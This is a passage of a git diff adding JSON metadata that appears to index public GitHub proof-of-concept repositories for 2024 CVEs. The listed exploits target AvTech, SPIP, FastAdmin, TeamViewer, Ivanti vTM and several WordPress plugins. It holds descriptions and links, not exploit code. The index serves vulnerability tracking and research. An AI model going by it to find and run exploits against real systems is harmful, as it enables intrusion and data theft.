"geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/CVE-2024-7029", + "description": " A PoC exploit for the CVE-2024-7029 vulnerability found in AvTech devices, allowing Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-10-08T10:04:08Z", + "updated_at": "2024-11-04T03:04:59Z", + "pushed_at": "2024-10-08T10:08:07Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7094.json b/2024/CVE-2024-7094.json new file mode 100644 index 0000000000..21bce49027 --- /dev/null +++ b/2024/CVE-2024-7094.json @@ -0,0 +1,33 @@ +[ + { + "id": 844067541, + "name": "CVE-2024-7094", + "full_name": "nastar-id\/CVE-2024-7094", + "owner": { + "login": "nastar-id", + "id": 57721604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57721604?v=4", + "html_url": "https:\/\/github.com\/nastar-id", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nastar-id\/CVE-2024-7094", + "description": "CVE-2024-7094 Vulnerability checker", + "fork": false, + "created_at": "2024-08-18T09:27:54Z", + "updated_at": "2024-08-21T10:19:13Z", + "pushed_at": "2024-08-21T10:19:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7120.json b/2024/CVE-2024-7120.json new file mode 100644 index 0000000000..73b4f493eb --- /dev/null +++ b/2024/CVE-2024-7120.json @@ -0,0 +1,33 @@ +[ + { + "id": 849964284, + "name": "CVE-2024-7120", + "full_name": "gh-ost00\/CVE-2024-7120", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-7120", + "description": "⚠️⚠️ CVE-2024-7120 Command Injection Vulnerability in RAISECOM Gateway Devices", + "fork": false, + "created_at": "2024-08-30T15:50:50Z", + "updated_at": "2024-11-20T16:31:03Z", + "pushed_at": "2024-08-30T16:29:33Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7124.json b/2024/CVE-2024-7124.json new file mode 100644 index 0000000000..a8ad6360f4 --- /dev/null +++ b/2024/CVE-2024-7124.json @@ -0,0 +1,33 @@ +[ + { + "id": 888565008, + "name": "CVE-2024-7124", + "full_name": "kac89\/CVE-2024-7124", + "owner": { + "login": "kac89", + "id": 5662731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5662731?v=4", + "html_url": "https:\/\/github.com\/kac89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kac89\/CVE-2024-7124", + "description": "Improper Neutralization of Input During Web Page Generation vulnerability in DInGO dLibra software in the parameter 'filter' in the endpoint 'indexsearch' allows a Reflected Cross-Site Scripting (XSS). ", + "fork": false, + "created_at": "2024-11-14T16:05:44Z", + "updated_at": "2024-11-14T16:09:22Z", + "pushed_at": "2024-11-14T16:09:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7135.json b/2024/CVE-2024-7135.json new file mode 100644 index 0000000000..7f80a6a96a --- /dev/null +++ b/2024/CVE-2024-7135.json @@ -0,0 +1,64 @@ +[ + { + "id": 871140348, + "name": "CVE-2024-7135", + "full_name": "RandomRobbieBF\/CVE-2024-7135", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-7135", + "description": "Tainacan <= 0.21.7 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Read", + "fork": false, + "created_at": "2024-10-11T10:56:59Z", + "updated_at": "2024-10-18T17:57:19Z", + "pushed_at": "2024-10-11T11:18:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 910661052, + "name": "CVE-2024-7135", + "full_name": "Nxploited\/CVE-2024-7135", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2024-7135", + "description": null, + "fork": false, + "created_at": "2025-01-01T01:07:29Z", + "updated_at": "2025-01-01T02:29:27Z", + "pushed_at": "2025-01-01T02:29:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7313.json b/2024/CVE-2024-7313.json new file mode 100644 index 0000000000..69bef79e98 --- /dev/null +++ b/2024/CVE-2024-7313.json @@ -0,0 +1,33 @@ +[ + { + "id": 843187042, + "name": "CVE-2024-7313", + "full_name": "Wayne-Ker\/CVE-2024-7313", + "owner": { + "login": "Wayne-Ker", + "id": 94828747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94828747?v=4", + "html_url": "https:\/\/github.com\/Wayne-Ker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wayne-Ker\/CVE-2024-7313", + "description": "Custom Proof-of-Concept on XSS to Unauthorized Admin Account Creation via WordPress Plugin Shield Security < 20.0.6", + "fork": false, + "created_at": "2024-08-16T01:01:57Z", + "updated_at": "2024-08-17T00:13:03Z", + "pushed_at": "2024-08-17T00:13:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7339.json b/2024/CVE-2024-7339.json new file mode 100644 index 0000000000..da5664516e --- /dev/null +++ b/2024/CVE-2024-7339.json @@ -0,0 +1,33 @@ +[ + { + "id": 838435771, + "name": "CVE-2024-7339", + "full_name": "RevoltSecurities\/CVE-2024-7339", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-7339", + "description": "An Vulnerability detection and Exploitation tool for CVE-2024-7339", + "fork": false, + "created_at": "2024-08-05T16:26:18Z", + "updated_at": "2024-11-19T03:01:34Z", + "pushed_at": "2024-08-10T17:38:53Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7456.json b/2024/CVE-2024-7456.json new file mode 100644 index 0000000000..ace706e343 --- /dev/null +++ b/2024/CVE-2024-7456.json @@ -0,0 +1,33 @@ +[ + { + "id": 882153324, + "name": "CVE-2024-7456scripts", + "full_name": "77Philly\/CVE-2024-7456scripts", + "owner": { + "login": "77Philly", + "id": 184293581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184293581?v=4", + "html_url": "https:\/\/github.com\/77Philly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/77Philly\/CVE-2024-7456scripts", + "description": null, + "fork": false, + "created_at": "2024-11-02T02:42:27Z", + "updated_at": "2024-11-02T02:58:40Z", + "pushed_at": "2024-11-02T02:58:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7479.json b/2024/CVE-2024-7479.json new file mode 100644 index 0000000000..28fdc1c84c --- /dev/null +++ b/2024/CVE-2024-7479.json @@ -0,0 +1,33 @@ +[ + { + "id": 864856964, + "name": "CVE-2024-7479_CVE-2024-7481", + "full_name": "PeterGabaldon\/CVE-2024-7479_CVE-2024-7481", + "owner": { + "login": "PeterGabaldon", + "id": 34518201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34518201?v=4", + "html_url": "https:\/\/github.com\/PeterGabaldon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PeterGabaldon\/CVE-2024-7479_CVE-2024-7481", + "description": "TeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.", + "fork": false, + "created_at": "2024-09-29T10:58:15Z", + "updated_at": "2024-12-26T02:57:19Z", + "pushed_at": "2024-12-22T21:34:26Z", + "stargazers_count": 132, + "watchers_count": 132, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 132, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7514.json b/2024/CVE-2024-7514.json new file mode 100644 index 0000000000..3ab95566b8 --- /dev/null +++ b/2024/CVE-2024-7514.json @@ -0,0 +1,33 @@ +[ + { + "id": 871135091, + "name": "CVE-2024-7514", + "full_name": "RandomRobbieBF\/CVE-2024-7514", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-7514", + "description": "WordPress Comments Import & Export <= 2.3.7 - Authenticated (Author+) Arbitrary File Read via Directory Traversal", + "fork": false, + "created_at": "2024-10-11T10:43:22Z", + "updated_at": "2024-10-18T17:57:22Z", + "pushed_at": "2024-10-11T10:45:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7593.json b/2024/CVE-2024-7593.json new file mode 100644 index 0000000000..caaf832321 --- /dev/null +++ b/2024/CVE-2024-7593.json @@ -0,0 +1,100 @@ +[ + { + "id": 848733673, + "name": "CVE-2024-7593", + "full_name": "rxerium\/CVE-2024-7593", + "owner": { + "login": "rxerium", + "id": 59293085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59293085?v=4", + "html_url": "https:\/\/github.com\/rxerium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rxerium\/CVE-2024-7593", + "description": "Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.", + "fork": false, + "created_at": "2024-08-28T10:02:05Z", + "updated_at": "2024-10-05T06:17:08Z", + "pushed_at": "2024-10-05T06:17:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cyber-security", + "ivanti", + "nuclei" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 862610561, + "name": "CVE-2024-7593_PoC_Exploit", + "full_name": "D3N14LD15K\/CVE-2024-7593_PoC_Exploit", + "owner": { + "login": "D3N14LD15K", + "id": 155617205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155617205?v=4", + "html_url": "https:\/\/github.com\/D3N14LD15K", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D3N14LD15K\/CVE-2024-7593_PoC_Exploit", + "description": "CVE-2024-7593 Ivanti Virtual Traffic Manager 22.2R1 \/ 22.7R2 Admin Panel Authentication Bypass PoC [EXPLOIT]", + "fork": false, + "created_at": "2024-09-24T22:24:35Z", + "updated_at": "2024-11-20T16:31:05Z", + "pushed_at": "2024-09-24T23:28:25Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871449363, + "name": "CVE-2024-7593", + "full_name": "skyrowalker\/CVE-2024-7593", + "owner": { + "login": "skyrowalker", + "id": 156471538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156471538?v=4", + "html_url": "https:\/\/github.com\/skyrowalker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyrowalker\/CVE-2024-7593", + "description": null, + "fork": false, + "created_at": "2024-10-12T02:17:14Z", + "updated_at": "2024-10-12T02:17:42Z", + "pushed_at": "2024-10-12T02:17:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7646.json b/2024/CVE-2024-7646.json new file mode 100644 index 0000000000..6764be8559 --- /dev/null +++ b/2024/CVE-2024-7646.json @@ -0,0 +1,64 @@ +[ + { + "id": 849537237, + "name": "CVE-2024-7646", + "full_name": "r0binak\/CVE-2024-7646", + "owner": { + "login": "r0binak", + "id": 80983900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4", + "html_url": "https:\/\/github.com\/r0binak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0binak\/CVE-2024-7646", + "description": "PoC CVE-2024-7646", + "fork": false, + "created_at": "2024-08-29T19:10:08Z", + "updated_at": "2024-08-29T19:10:33Z", + "pushed_at": "2024-08-29T19:10:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 862891732, + "name": "cve-2024-7646", + "full_name": "dovics\/cve-2024-7646", + "owner": { + "login": "dovics", + "id": 45029442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45029442?v=4", + "html_url": "https:\/\/github.com\/dovics", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovics\/cve-2024-7646", + "description": "PoC CVE-2024-7646", + "fork": false, + "created_at": "2024-09-25T11:13:07Z", + "updated_at": "2024-09-25T11:15:30Z", + "pushed_at": "2024-09-25T11:13:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7703.json b/2024/CVE-2024-7703.json new file mode 100644 index 0000000000..e2d767d15f --- /dev/null +++ b/2024/CVE-2024-7703.json @@ -0,0 +1,33 @@ +[ + { + "id": 843828348, + "name": "CVE-2024-7703", + "full_name": "lfillaz\/CVE-2024-7703", + "owner": { + "login": "lfillaz", + "id": 114345508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114345508?v=4", + "html_url": "https:\/\/github.com\/lfillaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lfillaz\/CVE-2024-7703", + "description": "This repository contains an exploit for CVE-2024-7703 in the ARMember WordPress plugin. It allows attackers with Subscriber-level access or higher to upload SVG files with malicious JavaScript, leading to Stored XSS attacks. This can result in executing scripts when the file is accessed, potentially compromising user sessions or data.", + "fork": false, + "created_at": "2024-08-17T14:44:08Z", + "updated_at": "2025-01-05T14:30:25Z", + "pushed_at": "2024-08-17T14:51:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7808.json b/2024/CVE-2024-7808.json new file mode 100644 index 0000000000..c1ef9537f8 --- /dev/null +++ b/2024/CVE-2024-7808.json @@ -0,0 +1,38 @@ +[ + { + "id": 884904353, + "name": "CVE-2024-7808", + "full_name": "TheUnknownSoul\/CVE-2024-7808", + "owner": { + "login": "TheUnknownSoul", + "id": 58050201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58050201?v=4", + "html_url": "https:\/\/github.com\/TheUnknownSoul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheUnknownSoul\/CVE-2024-7808", + "description": "RCE exploit for low privileged user via CSRF in open-webui ", + "fork": false, + "created_at": "2024-11-07T15:42:53Z", + "updated_at": "2024-11-20T16:31:09Z", + "pushed_at": "2024-11-08T10:08:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "csrf", + "hack-tool", + "open-webui", + "rce-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7854.json b/2024/CVE-2024-7854.json new file mode 100644 index 0000000000..77b420df5c --- /dev/null +++ b/2024/CVE-2024-7854.json @@ -0,0 +1,33 @@ +[ + { + "id": 867703844, + "name": "CVE-2024-7854", + "full_name": "RandomRobbieBF\/CVE-2024-7854", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-7854", + "description": "Woo Inquiry <= 0.1 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-10-04T14:59:36Z", + "updated_at": "2024-10-18T17:57:30Z", + "pushed_at": "2024-10-04T15:03:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7856.json b/2024/CVE-2024-7856.json new file mode 100644 index 0000000000..84a8257430 --- /dev/null +++ b/2024/CVE-2024-7856.json @@ -0,0 +1,33 @@ +[ + { + "id": 854473845, + "name": "CVE-2024-7856", + "full_name": "l8BL\/CVE-2024-7856", + "owner": { + "login": "l8BL", + "id": 151047781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151047781?v=4", + "html_url": "https:\/\/github.com\/l8BL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l8BL\/CVE-2024-7856", + "description": "Proof-of-Concept for CVE-2024-7856", + "fork": false, + "created_at": "2024-09-09T08:34:09Z", + "updated_at": "2024-09-10T07:28:54Z", + "pushed_at": "2024-09-09T08:39:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7928.json b/2024/CVE-2024-7928.json new file mode 100644 index 0000000000..c09f528c64 --- /dev/null +++ b/2024/CVE-2024-7928.json @@ -0,0 +1,126 @@ +[ + { + "id": 844819282, + "name": "CVE-2024-7928", + "full_name": "bigb0x\/CVE-2024-7928", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-7928", + "description": "Will attempt to retrieve DB details for FastAdmin instances", + "fork": false, + "created_at": "2024-08-20T03:09:47Z", + "updated_at": "2024-11-20T16:31:01Z", + "pushed_at": "2024-08-20T03:21:56Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 61, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 845013815, + "name": "CVE-2024-7928", + "full_name": "gh-ost00\/CVE-2024-7928", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-7928", + "description": "CVE-2024-7928 fastadmin vulnerability POC & Scanning", + "fork": false, + "created_at": "2024-08-20T12:15:48Z", + "updated_at": "2024-09-23T12:28:22Z", + "pushed_at": "2024-08-20T12:26:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846105212, + "name": "CVE-2024-7928", + "full_name": "wh6amiGit\/CVE-2024-7928", + "owner": { + "login": "wh6amiGit", + "id": 121056021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121056021?v=4", + "html_url": "https:\/\/github.com\/wh6amiGit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wh6amiGit\/CVE-2024-7928", + "description": "CVE-2024-7928 FastAdmin < V1.3.4.20220530 exploit", + "fork": false, + "created_at": "2024-08-22T14:39:13Z", + "updated_at": "2024-08-23T15:32:23Z", + "pushed_at": "2024-08-23T15:32:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846625199, + "name": "CVE-2024-7928", + "full_name": "th3gokul\/CVE-2024-7928", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-7928", + "description": "CVE-2024-7928: FastAdmin < V1.3.4.20220530 Arbitrary File Reading Vulnerability", + "fork": false, + "created_at": "2024-08-23T15:50:30Z", + "updated_at": "2024-09-28T20:39:18Z", + "pushed_at": "2024-08-23T16:59:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7954.json b/2024/CVE-2024-7954.json new file mode 100644 index 0000000000..42e4a8de59 --- /dev/null +++ b/2024/CVE-2024-7954.json @@ -0,0 +1,250 @@ +[ + { + "id": 840829976, + "name": "CVE-2024-7954", + "full_name": "Chocapikk\/CVE-2024-7954", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-7954", + "description": "Unauthenticated Remote Code Execution in SPIP versions up to and including 4.2.12", + "fork": false, + "created_at": "2024-08-10T20:15:41Z", + "updated_at": "2024-12-25T19:00:23Z", + "pushed_at": "2024-08-12T13:46:06Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 848869603, + "name": "CVE-2024-7954", + "full_name": "bigb0x\/CVE-2024-7954", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-7954", + "description": "This exploit will attempt to execute system commands on SPIP targets.", + "fork": false, + "created_at": "2024-08-28T14:54:56Z", + "updated_at": "2024-09-18T22:48:10Z", + "pushed_at": "2024-08-28T18:26:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850636095, + "name": "CVE-2024-7954-RCE", + "full_name": "gh-ost00\/CVE-2024-7954-RCE", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-7954-RCE", + "description": "Unauthenticated Remote Code Execution in SPIP versions up to and including 4.2.12 ", + "fork": false, + "created_at": "2024-09-01T10:59:45Z", + "updated_at": "2024-12-24T06:10:23Z", + "pushed_at": "2024-09-01T11:07:15Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 861854729, + "name": "RCE_CVE-2024-7954", + "full_name": "TheCyberguy-17\/RCE_CVE-2024-7954", + "owner": { + "login": "TheCyberguy-17", + "id": 182538709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/182538709?v=4", + "html_url": "https:\/\/github.com\/TheCyberguy-17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberguy-17\/RCE_CVE-2024-7954", + "description": null, + "fork": false, + "created_at": "2024-09-23T16:11:20Z", + "updated_at": "2024-10-16T03:51:59Z", + "pushed_at": "2024-09-23T16:27:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867991834, + "name": "RCE-CVE-2024-7954", + "full_name": "MuhammadWaseem29\/RCE-CVE-2024-7954", + "owner": { + "login": "MuhammadWaseem29", + "id": 161931698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161931698?v=4", + "html_url": "https:\/\/github.com\/MuhammadWaseem29", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MuhammadWaseem29\/RCE-CVE-2024-7954", + "description": null, + "fork": false, + "created_at": "2024-10-05T07:24:57Z", + "updated_at": "2024-10-16T17:20:37Z", + "pushed_at": "2024-10-05T07:55:00Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889221961, + "name": "CVE-2024-7954", + "full_name": "issamjr\/CVE-2024-7954", + "owner": { + "login": "issamjr", + "id": 101994309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101994309?v=4", + "html_url": "https:\/\/github.com\/issamjr", + "user_view_type": "public" + }, + "html_url": 